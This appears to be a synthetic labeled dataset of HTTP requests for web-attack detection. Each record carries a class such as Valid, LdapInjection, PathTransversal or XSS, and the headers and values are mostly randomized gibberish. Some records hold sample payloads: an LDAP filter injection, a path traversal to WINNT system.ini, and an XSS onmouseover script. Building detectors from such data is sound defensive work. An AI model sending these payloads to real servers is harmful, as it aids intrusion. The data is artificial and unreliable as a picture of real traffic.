~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48
Start - Id: 24118
class: Valid
GET /irBt/oN8VfI.7@HHksamdelete/48@l/6RCWdyvD5dqo368/iXg/S-@sHF/tnIfxl/j1e/i5._.exe?elce2Mnstlt=form5&tae=owinntca%3D%3Fatz%3DoiT&elYtmedp84be=s-ph%40Fn%2Fiehc0demailrbodyma&bnWEJ5=s5cTh8qvv&4lEtaabYPxtH=2238899 HTTP/1.1
Host: 147.97.82.88
Connection: etode
Accept: text/*, application/zip, application/zip;q=0.8
Accept-Charset: ks_c_5601-1987, euc-jp;q=0.9, x-mac-ce;q=0.3
Accept-Encoding: deflate, compress, deflate;q=0.7
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 17.13.132.139
Cookie: elrrt=eedDenfxhoe2Hstdinh;oaLBhLuS=W;nksattlvew3ct=bnrNNkWt;nHx=23;ixesltatNni7y=le5=ofVezi2z2meta
Cookie2: $Version="9"
Date: Tue, 03 Jun 08 19:42:07 GMT
ETag: W/"csn8IelteXHYnWTqdNm"
Expect: oavt=eThntlo2
From: teocayH@bcantyn.net
If-Modified-Since: Sun, 30 Dec 07 20:07:45 UTC
If-Unmodified-Since: Tue, 22 Apr 08 16:48:45 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 394
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: rephn 9uuqEn=draec
Range: -293,9-
Referer: http://www.eacct.gov/camqe/tobfGf4l/bAt67h.jsp
TE: deflate,deflate
Trailer: If-None-Match
User-Agent: tdtmqYi (h6poha6WR; rI5@jPbX; bKp4Rci; mBKEr1; og.Jz1xT5e)
UA-CPU: StrongARM
UA-Disp: 3355,078,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 109x7677
Via: 2.5 www.Ddglel.css, HTTP/3.0 29.52.174.4
Transfer-Encoding: compress
Upgrade: hlnn4/1.8
Warning: 382 www.ni2t.htm "ztadtttA6sydiidea" "Fri, 07 Jan 05 08:48:11 CET"
X-Forwarded-For: 33.216.101.183
X-Serial-Number: 98139157905
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24118
Start - Id: 38979
class: LdapInjection
GET /nUMb8/oK/ra7tudwtfhrecssant/fR@102HusrmochaOvUR/edorI/oonTrntsono/e0B8iHkcsP9/c4/wWuxa0daAO/8RczSXhxmOy5zn59qd4/2bIYaxLHuN5hrQ.shtml?n7OevaljJNorT=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 49.50.131.9
Connection: zistec
Accept: video/mpeg, video/quicktime;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.9, gzip, compress, identity;q=0.0, gzip
Accept-Language: iRAhS-d1eeg, apad-aenwi;q=0.1, RivT-d0iodey, nspr-ec1s;q=0.9, otn-nujie
Cache-Control: max-stale
Client-ip: 39.110.44.223
Cookie: tMgmrWhwdewm=08825
Cookie2: $Version="53"
Date: Tue, 09 Jun 09 03:02:45 UTC
ETag: W/"aTH7ojAKF7GuLTnx"
Expect: 100-continue
From: aPbb@hdints.de
If-Modified-Since: Mon, 22 May 06 02:47:52 CET
If-Unmodified-Since: Mon, 10 Apr 06 21:22:54 GMT
If-Match: "-bh6PVfsKGNMKV-"
If-None-Match: "IXcidcWwp_F18ou8yanP"
If-Range: "HhF1kiMkkPg4wFXvIn"
Max-Forwards: 1468
MIME-Version: 8.0
Pragma: ebl3JI='e'
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: hsarsh iemroH=lnEh69
Range: -026476,-042,-27632
Referer: http://pp85nis.it/Amiixl/4clo.exe
TE: trailers,gzip;q=0.7
Trailer: Max-Forwards
User-Agent: tatsj (l3m5U6SA; eLfi-83p; efXtk0; eKSu7LEIlq; rUJI5JtR)
UA-CPU: MIPS
UA-OS: Win98
UA-Pixels: 8193x847
Via: 7.5 www.uuwuwE.gif, 4.1 www.rsgtnt.jpg
Transfer-Encoding: ouat; nwMsn=ctyo
Upgrade: rsS/8.2, 0dcoT/9.2, sO3bf/3.2, o6e/7.5
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38979
Start - Id: 27941
class: Valid
GET /kzadrphSsnproo.htm?Ttt5=bd+t4c%5C%5D8&o1h8lueil=02 HTTP/1.1
Host: 46.87.64.255
Connection: keep-alive
Accept: image/png, audio/*
Accept-Charset: iso-8859-8-i
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=1
Client-ip: 115.171.171.121
Cookie: si3ludieegsq=6915179;een2yGr9L=tpWuca(oiidhn;ePeavjdds=00267;sn8=94943;avhHpzemO=7Ze;m3E=a5Ze-qK
Cookie2: $Version="5"
Date: Fri, 22 Dec 06 17:09:14 UTC
ETag: "ioGj.SWMOaK1l.Z4w"
Expect: 100-continue
From: aclt@ntyaoohns.cz
If-Modified-Since: Mon, 02 Feb 09 24:35:45 UTC
If-Unmodified-Since: Thu, 28 May 09 12:32:32 CET
If-Match: *
If-None-Match: "H57c2nQtuwup@WJtwy"
If-Range: *
Max-Forwards: 787
MIME-Version: 8.9
Pragma: dst3an=ha
Proxy-Authorization: aseiIS htdyI=sragn
Authorization: Basic NHRuZWNvOmVodG9kY3N2
Range: 70-8,-3
Referer: /Oastvv/eri9eems/Sata.nsf
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/0.7 (Machintosh; U; PPC Mac OS X 6.2; an-sb; rv:4.1.2) Gecko/89328197
UA-CPU: Sparc
UA-Disp: 666,785,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0093x2454
Via: 2.9 125.82.169.76, 6.1 www.ducn.png:73258, 9.3 165.226.137.83
Transfer-Encoding: n1im9
Upgrade: hrdi/7.3, pbnr/9.0, Etitb/6.6, cut/3.8
Warning: 832 59.92.226.57 "4ttWsncayb0" "Thu, 06 Dec 07 08:46:18 CET"
X-Forwarded-For: 122.177.179.211
X-Serial-Number: 149066712456
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27941
Start - Id: 6128
class: Valid
POST /EB3ceYthtd/Eeeu0Tnisgae2i41n/hz87FC5l/ovpks5o/xsaltsoNfa4neegIosa/ehMZdaPPR9REr-r/ejKAdA9LcNAYFDrS7M/egTbldonvg/iEilteh3ani8r6aE/amEspu/w9ay0nRem3bq@/bvdinaset4eaa68.png? HTTP/1.0
Content-Length: 250
Content-Language: Rlerthp,zv
Content-Encoding: compress
Content-Location: http://e2rE.it/lctdtfs/kdaasn/eSUunbiu/Hra5ronh/N7tehfeN.htm
Content-MD5: YXJncGJnYWlsM2ppbkVlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 15 Jan 10 06:14:13 UTC
Last-Modified: Thu, 22 Dec 05 20:17:46 GMT
Host: www.onNicyF3.org:80
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: etr-eaoa;q=0.0, dc4nm-4aoHhh;q=0.4, nda-avsfi, Ei-3c5doh
Cache-Control: min-fresh=0
Client-ip: 2.7.31.61
Cookie: rieart=nertidGoote;dSddOnhtto=kYgSBEqy8do;LkservicesA40ak=s37z3rnlinko@amo;infhX9irltlorej=kK.x4k@5;a1du4h=ehweeehnuhTE;J_2F6RV=:esTojw+rostdinip5h
Cookie2: $Version="901"
Date: Sun, 07 Nov 04 22:44:25 UTC
ETag: W/"LgvUzZfMgjoNvwGvu22I"
Expect: 100-continue
From: Etnnkns@tnee.fr
If-Modified-Since: Mon, 30 Nov 09 03:11:26 CET
If-Unmodified-Since: Wed, 18 Apr 07 05:21:08 GMT
If-Match: "GE02bdpeqITD7nUKl"
If-None-Match: "wgixAFg6S29Glk8FPsqJ"
If-Range: Sat, 28 Feb 09 22:47:08 CET
Max-Forwards: 70
MIME-Version: 2.7
Pragma: u61rB='vIsew'
Proxy-Authorization: NTLM ZTdwZWlhb2Qyd21kY25zZW9vdGE4TGVuMGV0bmlocnJBcnJzYQ==
Authorization: ithns 9eqoxm=oittsrl
Range: -53632
Referer: http://www.llasas.st/mc4a/p9tcrr/iqnaeyn/mhrenr.zip
TE: deflate;q=0.3,trailers
Trailer: Via
User-Agent: nsio (s_RRxiI.7; kc8SDb; fSP@u1b; 8u_XkL)
UA-CPU: StrongARM
UA-Disp: 8680,157,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7265x3057
Via: Neqreu/1.2 31.96.129.45
Transfer-Encoding: gzip
Upgrade: hUaed/9.4, n1r/4.5, n0p/2.3
Warning: 335 www.isiR.js "eyuxr" 
X-Forwarded-For: 150.210.233.126
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

HaltiEproyop=191208&joelcxeeO9ai7r=f2Ae1u&aO=4548&enaahcjeso=i6ubo&4hetolt=S&hhlio6Fysv9=tz&SJsamsam6bSC=68097518&C5P-.=eYi4E7kERsKe&seWspstr=tghS&SvcletOxtdb=7092414&lrre=6eys:llcaohttpshQpm0i&tu6A75em=o8&eEetZedAenuh=dauitdrdotey&octhliaig=u tD2u

End - Id: 6128
Start - Id: 45782
class: PathTransversal
GET /e8tCibottttx/thbVqxqwXc0iZHb0U/0@2.php4?lp=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&rss0eM=ahL5v HTTP/1.0
Host: 23.187.36.86
Connection: close
Accept: audio/*;q=0.1
Accept-Charset: us-ascii;q=0.4, iso-8859-8;q=0.3, euc-jp
Accept-Encoding: *;q=0.7
Accept-Language: h9-LndneEta;q=0.9, et-joesonp
Cache-Control: only-if-cached
Client-ip: 79.240.194.64
Cookie: zUe= rindausrteht<oo;dmlatp4=7
Cookie2: $Version="65"
Date: Sun, 05 Sep 04 01:36:48 CET
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: fli7=ifppb
From: a3y5m@itfi.st
If-Modified-Since: Sun, 04 May 08 20:19:30 UTC
If-Unmodified-Since: Sun, 03 Jul 05 20:05:06 UTC
If-Match: *
If-None-Match: *
If-Range: "Irwt@In046fuLsQ0."
Max-Forwards: 6
MIME-Version: 1.4
Pragma: easherur='y0e7doe'
Proxy-Authorization: Digest realm
Authorization: oexndP er7lw7e=8laieuG
Range: -75,2802-6
Referer: /vuhvKsaR.mdb
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: tfC.CPv http://www.reri.org
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9422x259
Via: tA4cu/1.3 76.219.127.217, 9.4 23.44.129.57
Transfer-Encoding: identity
Upgrade: F3awa4/4.3, 9rim7/0.4, reilie/2.8, 3il/4.5, Stse/6.1
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 0.142.120.56
X-Serial-Number: 324157325
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45782
Start - Id: 1716
class: Valid
GET /3AkjpchFFkKEPFonXCa/tooxseii/5eLEz8Zi/ek42o/jL/aiVsam/Vaccess_logqO51zXGncBjV.jpeg?pAIssttiu=hLvsRQmpq&sih5ezpeoxi=frtiahsee&e9m=rgdeetcEt+%27xlltus&uwsoehfmGetav=ftfghdbif&Cictece=include&F%uL@a@--zm=rnei&eg3d3naOoeOinB=ob4FNV6d69&RH_X=01419&eeamhplaor=14556 HTTP/1.0
Host: www.kleieMc.com:80
Connection: k89tbb
Accept: application/x-tar;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: he4lu-jnwbym;q=0.4, e-zgtttnoe, ei-ltd;q=0.4, aKdqNsom-n;q=0.2, 2aIo-npwa6w
Cache-Control: only-if-cached
Client-ip: 114.67.189.247
Cookie: esfezneh6isnd=oo;tvie=y84-j9Z;niE5de54giie=616398;EblhiyaesOlar=112573608;neaiStq0eww=3xnfktTnXmohittw
Cookie2: $Version="689"
Date: Sat, 23 Oct 04 21:33:49 CET
ETag: "LqP66AJ3sj.doSbglm"
Expect: 100-continue
From: pa7hs@flEnsebniq.be
If-Modified-Since: Wed, 12 Aug 09 05:15:28 GMT
If-Unmodified-Since: Mon, 05 Sep 05 23:56:47 UTC
If-Match: "SOe.eZo5edygQk5nz"
If-None-Match: *
If-Range: Mon, 28 Sep 09 10:56:11 UTC
Max-Forwards: 51
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: emecsi fabsze=aeeaEeas
Range: 544912-
Referer: /tc7t2j.bin
TE: deflate,trailers,gzip
Trailer: Date
User-Agent: pseoe (tPcuowa; nvitTV; o6gAzD_lU; oq8BJtswlA)
UA-CPU: PowerPC
UA-Disp: 6638,4343,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 053x890
Via: HTTP/2.7 www.nfjrto.tiff:219
Transfer-Encoding: gzip
Upgrade: ejodco/1.2, nnhlf/2.2, sht/7.3, 6nmn/0.5, neetes/1.7
Warning: 145 www.Iehgiho.html "wrbmde7w6d7Oeekrmc" 
X-Forwarded-For: 102.24.89.42
X-Serial-Number: 634106000415144
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1716
Start - Id: 9719
class: Valid
GET /thd7a/oncOg2mutrinmu.aspx?ae8en4etaRs9seb=j0Uk HTTP/1.1
Host: www.ielxen8e.st
Connection: pupsajh
Accept: text/plain;q=0.3, image/jpeg, text/html
Accept-Charset: iso-8859-8;q=0.9, x-mac-icelandic, us-ascii;q=0.3, iso-10646-ucs-2;q=0.9, x-mac-chinesetrad;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=196
Client-ip: 130.86.54.98
Cookie: nzcwhyfCcy=8258110;estSs7=xdwx7g4wcVa
Cookie2: $Version="608"
Date: Thu, 17 Nov 05 06:10:28 GMT
ETag: W/"DJNzeDYWi.q7Ci0JSt"
Expect: tihPx=nn3kdjz
From: e6u7@maaoofdu.fr
If-Modified-Since: Wed, 03 Sep 08 19:19:39 GMT
If-Unmodified-Since: Sun, 20 Mar 05 03:21:24 CET
If-Match: "BrpD7Ct12nFnz9Q5@3j"
If-None-Match: *
If-Range: Mon, 12 Jun 06 17:38:55 GMT
Max-Forwards: 5634
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest nc=aCF05B7C
Authorization: NTLM dGl6aGl1amF1YWVpaW9YeWVyaGFhZGxpc3AzaXRQaW9UcjFhbGloc3RuN3M3cnRl
Range: 56419-6047,31908-,-5753
Referer: /aw2e/regrF.pl
TE: trailers,deflate,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.8 (X11; U; Solaris 8.0; o7-tl; rv:0.6.5) Gecko/20334032
UA-CPU: StrongARM
UA-Disp: 5705,3975,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6817x021
Via: FTP/8.6 www.deeotu3p.shtml, HTTP/9.6 124.147.198.245
Transfer-Encoding: compress
Upgrade: e3d/8.2
Warning: 433 www.ehhrp.gif:2957 "rSrtoo9noa" "Mon, 31 Oct 05 18:45:44 CET"
X-Forwarded-For: 186.223.84.207
X-Serial-Number: 66630290652
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9719
Start - Id: 30450
class: Valid
GET /eX/uRlddaalsiuypis/atdzwtyrfee/ya239mw/mmoossdaIaoenaNw.swf?V54=f&hpftAerrde=5&ghqryeuhaooeh=73347239&3puhsded3e2i=eGrmj&fir=2350 HTTP/1.0
Host: www.aq6pe8oHa.uk
Connection: atra
Accept: */*
Accept-Charset: x-mac-korean
Accept-Encoding: identity;q=0.5, deflate;q=0.0, compress;q=0.8, identity, deflate
Accept-Language: *;q=0.2
Cache-Control: tthn='f6n'
Client-ip: 247.200.104.227
Cookie: oanrkyk=eP6AFLFp7V8-;zsrion2=1;ipeahdra=rdM-YUAD0K;7mliIsHTsetMn=ttMihyanhtpassa?ey;QxeQe8=1381;lttn=3a8pretexudex
Cookie2: $Version="863"
Date: Tue, 29 Sep 09 07:43:47 GMT
ETag: "lIDSuiTDlae7j3gfHjg"
Expect: ow6wn
From: owe86ct@wnsee.de
If-Modified-Since: Wed, 28 Nov 07 02:57:37 CET
If-Unmodified-Since: Tue, 14 Jun 05 10:43:23 UTC
If-Match: *
If-None-Match: *
If-Range: "KKhE.T63yuAnCy4F6ezR"
Max-Forwards: 7566
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic b2NweDlxOnN0dDFpcmV0
Authorization: NTLM bmViczF6ZU5ucm55YnRheGJvdW9wb200bGl1dWQ5dHRhc3hndW51SGVhaA==
Range: 9-01848
Referer: http://ljot.org/Raeprmee/adrvex9/bp2s8i/ebdaiw/regrsE.mspx
TE: gzip;q=0.0,chunked
Trailer: Cache-Control
User-Agent: Qcg2r (2wGUyWNZK; lgGvMyl6mB)
UA-CPU: PowerPC
UA-Disp: 2897,898,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 710x3564
Via: HTTP/3.0 www.Wtgjh.shtml, 2.8 189.68.132.179
Transfer-Encoding: deflate
Upgrade: dksM/4.0, egtr/5.6, at1f/2.7, Ruilnr/5.9, epf4h3/8.8
Warning: 436 189.87.16.62 "zuob" "Sat, 09 Feb 08 20:28:53 GMT"
X-Forwarded-For: 97.116.231.157
X-Serial-Number: 839589841918771
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30450
Start - Id: 23973
class: Valid
GET /wgetu.F4/eK9/7PJpWM/oio/grciJ4eand33am/dVhLocO2RPwCy0.X/h7HeWQXt0N/gen4qNskqIif/ujoj9iao8x/rziot/ozK-_CjhUBL56O6AL/nk1Fh2P.js?GIgc_nodeetcAc=0532&oAtelj=ntco%3F&.scriptgJ5=linkdivelink&aeb5on=C+hw&nodezbOnSDK=yd07cixx2its&T6nA9vU=topnroeas0e&heu8llnts=1621092&Umt7h0hett=rjtgi4ovn2w&8Fyx8iane=2420301489&pytlRs=ytflnaoIwlxoK&ioelsoone=%29qn2%3D HTTP/1.0
Host: 227.112.219.20:80
Connection: kwhl4I
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 75.189.212.193
Cookie: amzsTy2seleioC=v2y;fple7uh=rC7e;zo=etaf;qnmRtmD29t=pSdothoNqah
Cookie2: $Version="33"
Date: Wed, 19 Dec 07 07:17:18 CET
ETag: W/"S8SpMd3ksau@hp111U_"
Expect: 100-continue
From: htqn@tqeodss7o.fr
If-Modified-Since: Mon, 21 May 07 16:17:05 CET
If-Unmodified-Since: Sun, 27 Apr 08 03:33:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: inaoa alei=oniea9pA
Authorization: Basic dGpobzp0dDFpZW4=
Range: 1318-,5425-185
Referer: /simtkaij/zonad.mdb
TE: chunked;q=0.5,gzip,chunked
Trailer: Accept-Charset
User-Agent: 3srSnlckaYfilirfg
UA-CPU: StrongARM
UA-Disp: 862,451,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 424x2298
Via: 7.2 42.38.169.145
Transfer-Encoding: identity
Upgrade: qanosa/4.6, asEeh/0.8, 67nibL/5.1, xnijf/5.3
Warning: 887 www.oialrTl.png:6 "2bmahswyehtth" 
X-Forwarded-For: 53.58.146.5
X-Serial-Number: 149109156633944
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23973
Start - Id: 48100
class: XSS
GET /lntm2ih/-rmFdocument/thatmauewosunathl/jUAzLB1Oidoda/gl4A@lvUFHT9D/ctilhc/0nSrn/vumiacth1eetoigTu2b/ands5tiwtl/qe1Esllt4olon6RC/nrc/Ts1tpeeK.sh?6conbqh=%3Cimg+++src++%3D%22+++++nsna+++++%22onmouseover+%3D+++%22++++%5Balert+++%28%27n0gne7u%27%29%3B%5D%22%3E&iw=n-perl&bp0oi5saf=vad&em3rentYn=8&tteE3b=60210338&2BSCTU=wadio%7E4eP%26IrnZ8insert&adEi0Ert0ewt=774952&mw35mn=174610&SRvXRwftpuS76=%27hdwt%3CrnrT&aehr5L=00438367&boohelxaeh=nUe4towteawinntkt7qmeA&tiurebiChjvepmn=ahS9fbtVWL HTTP/1.0
Host: 143.91.213.196
Connection: keep-alive
Accept: text/plain;q=0.4, image/gif;q=0.9, audio/*;q=0.6
Accept-Charset: x-mac-arabic, shift_jis;q=0.3
Accept-Encoding: *
Accept-Language: i2l-ns, 8-tta;q=0.8, yti4r-oe0;q=0.5
Cache-Control: max-stale=7
Client-ip: 148.235.193.134
Cookie: cvbscript21JLF._iY= i;ix=LhoVoma;noem=rnh% bxel;CsebbuDudleeru=tfeNsje;qNTinsertMFAoxmlm@=9251908052;HixtMChb=i xSeliLgroup by[9mrexssw
Cookie2: $Version="657"
Date: Fri, 08 Oct 04 19:52:00 UTC
ETag: W/"AKr90LoeB4iWhbN"
Expect: 100-continue
From: aIafz@wvamBrQ.uk
If-Modified-Since: Mon, 26 Nov 07 02:35:05 CET
If-Unmodified-Since: Sun, 07 May 06 03:14:47 GMT
If-Match: "tJX6Lsh4xpqwcWn"
If-None-Match: *
If-Range: Mon, 03 Mar 08 21:30:01 GMT
Max-Forwards: 187
MIME-Version: 8.7
Pragma: mooeci8=awue
Proxy-Authorization: Basic WmhpbnF3Tzp3czhmZG8=
Authorization: ny9cr sjeOhe=rf9a
Range: -179295,540225-63
Referer: /twiet/eobe3.cfm
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: t3LXm4wYJ http://www.D1olaatm.fr
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6001x2247
Via: HTTP/0.0 154.129.237.167:80326, 7.9 203.207.173.125, FTP/7.7 166.255.101.160
Transfer-Encoding: gzip
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48100
Start - Id: 7311
class: Valid
PUT /wpleosb6/lcnY_96NnNcCSofS/Rpptmuebus/pZsYserviceswHZ/oewEURM/esgnrd/ojojOHPVoizQM/qcuiisrnulnortc/to@jbE.kOU-rWQ.jH.png? HTTP/1.0
Content-Length: 240
Content-Language: qet1dr,ffnitetI,eenveoti
Content-Encoding: identity
Content-Location: http://www.OliEgr.biz/eeeyeEi/4Elt/bcAlolhc/gefsar/ittit.jpeg
Content-MD5: ZWswc3lzb3lhRk5zcmlnNg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Sep 07 12:51:07 UTC
Last-Modified: Fri, 03 Apr 09 22:40:40 GMT
Host: www.o7zt7tn.gov
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251, us-ascii, windows-1251, utf-7
Accept-Encoding: identity;q=0.8, compress;q=0.8, compress, compress;q=0.7, deflate
Accept-Language: wvnal-marA
Cache-Control: no-cache
Client-ip: 17.44.116.170
Cookie: jnQFwmtxnbetween_=1330;Xldrn6dgL8oihle=sY0;inTnOetejntgug=eakld;lRthKu2sa=29oe;UhavingD@W=hh8;cta9t2il=02587
Cookie2: $Version="837"
Date: Sun, 13 Mar 05 03:17:05 UTC
ETag: W/"QEY5Oyp3iSSgAFKYh44b"
Expect: tsuNiea=xynPiefx
From: ha4h@ntbt8vhFn.cz
If-Modified-Since: Mon, 04 May 09 24:54:30 CET
If-Unmodified-Since: Fri, 28 Apr 06 02:03:34 GMT
If-Match: "QZk@0MJQtECqb@AmUX"
If-None-Match: *
If-Range: Wed, 07 Jan 04 20:59:27 GMT
Max-Forwards: 186
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NcOwe 3e3si=NxvAfs
Range: 843670-7300,78-
Referer: /eatu1eR/xtrr/igucizb/c4fuilrf/woIusbFs.tar.gz
TE: trailers,chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: t-P.ng http://www.orfie1.biz
UA-CPU: 68000
UA-Disp: 4520,707,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1302x7380
Via: 6.0 www.eswnIAn.png
Transfer-Encoding: identity
Upgrade: Pcr/6.7, asmrbh/9.1, ayi/9.1
Warning: 465 193.0.29.240 "9tdbganttoetamdoth" 
X-Forwarded-For: 180.148.168.191
X-Serial-Number: 83189870004796915
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gehndyullWp=m1iehC&a2ru=lGZh&@mQnYsamL=3kHV6xnv&ivhp=7085&gzgREwinnt=1110376&il=Rh&cynWseO=eneoOeegd'@t&Pebdsr8oe8cu= &6udmb=902680&r3oo8as3trajpn=067470&KdoqltatDs=haorak&5IUeMxnull@m=dies9y&aoodapa=yt;x&tbiVtya8orAta=oepasswdue5s  b

End - Id: 7311
Start - Id: 14491
class: Valid
GET /toWlikeV3.Ty9/esock_streamwrcpYE/5xDPSh/KSqKR/rLeAconnectMhsuGY1hJ/nV0-300/erleusaelaitijose/dnenancUm4ezwvee.jpg?iis=%28Smbta&bsO8eu3reiashe=iwaht5slbl&ZVexec-htIYS=15 HTTP/1.1
Host: 83.54.86.240:8
Connection: keep-alive
Accept: video/quicktime;q=0.0, application/*;q=0.9, application/postscript
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 156.195.173.2
Cookie: q7Ghco=nih;30sm=52416403
Cookie2: $Version="838"
Date: Wed, 13 Aug 08 18:57:06 UTC
ETag: "fQBb1ktCDdUr54GpFU"
Expect: ulijiif
From: utt4e4@eaLhafx.uk
If-Modified-Since: Sun, 03 Jan 10 01:33:21 GMT
If-Unmodified-Since: Mon, 18 May 09 15:39:40 GMT
If-Match: "GHqjDmmmkqTNHSBjQRif"
If-None-Match: "lpiWsGheC-4CrFXC"
If-Range: *
Max-Forwards: 9
MIME-Version: 5.2
Pragma: nxtn='e9tiot'
Proxy-Authorization: Digest cnonce="2tl6"
Authorization: n0mr 3Ethitaq=yejS
Range: 737195-
Referer: /teafyT/tK8hi1/hOmo/zIeCi.avi
TE: chunked;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.5 (Machintosh; U; PPC Mac OS X 6.8; Kw-sm; rv:5.2.5) Gecko/82273432
UA-CPU: StrongARM
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2304x0310
Via: 5.7 105.222.53.248, FTP/6.7 82.100.58.28
Transfer-Encoding: identity
Upgrade: aha/1.7, himts/1.6, uNp/7.6, Grw/1.1, Etd/1.9
Warning: 474 www.anislbri.html "nTdethnvs" 
X-Forwarded-For: 33.83.28.62
X-Serial-Number: 58967727839058915929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14491
Start - Id: 19699
class: Valid
GET /onmnnieshtoh/fC0D-EofI.Z__OzWY/uwzsIyjMhWu/AV1SYAUKNrw/yOrdm/g2A.Z0ZallOJN4A/rm3em3ptXqqJRp6@s2Zc/7fieeqhdrfAsimseette/oaho7enBesdCdVinao/Xqs2ae/adn0Pc5NZ7Qg/qx1n2fVjFz7hq7-wU1ug.sh?urr4lee=dhyryobddi&otfqdeiiioaess=oyHnrtWic&soartbx4=6387882&rtoesM5etesTp=zttrcReabtt%25uT2&iialtTbmlenara7=cuClJla1Q&erhainhc=Btndocument%7EafzO&kVrF=e&hdeBh=8250263&1trr=56974566&astaz4el6leasp=Sogtseee5ravoeRs&meteIbs=+eeaiu9feny%40+m&5are9eeIed=nOa6cuW&Plhuh3irnoopb=wEvtbadminHpexecejt6m%25rdropb&qlerOpu=oEK4pbOUmSNP HTTP/1.0
Host: www.oxldvi.org
Connection: 9gme
Accept: */*
Accept-Charset: iso-8859-8;q=0.6, koi8;q=0.3, windows-1258;q=0.5, windows-874
Accept-Encoding: gzip;q=0.3, gzip;q=0.8, deflate, compress, compress;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 189.62.159.142
Cookie: ek=5;L_incopy=580286;7h=nJC8ZDr@M
Cookie2: $Version="138"
Date: Sun, 11 Jun 06 05:27:38 UTC
ETag: "eEdcWMNNX4bKI0hGF4"
Expect: 100-continue
From: moea@estmzx.uk
If-Modified-Since: Sat, 31 Oct 09 07:40:50 CET
If-Unmodified-Since: Fri, 10 Dec 04 05:14:13 UTC
If-Match: *
If-None-Match: "LL1msfManbsY@hStL"
If-Range: Wed, 24 Dec 08 23:55:11 GMT
Max-Forwards: 2
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: is6eir e7Od1r=qus9thtv
Authorization: Basic ZGVhU3Q6c3RyRWRPb1M=
Range: -6,-1,-676621
Referer: http://www.ssapseaa.st/sipSt/heBnqw/enEu9iEc/smeoa.bin
TE: chunked,gzip;q=0.9,chunked
Trailer: Authorization
User-Agent: utdonurg9sn6ltg
UA-CPU: PowerPC
UA-Disp: 822,055,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 947x1810
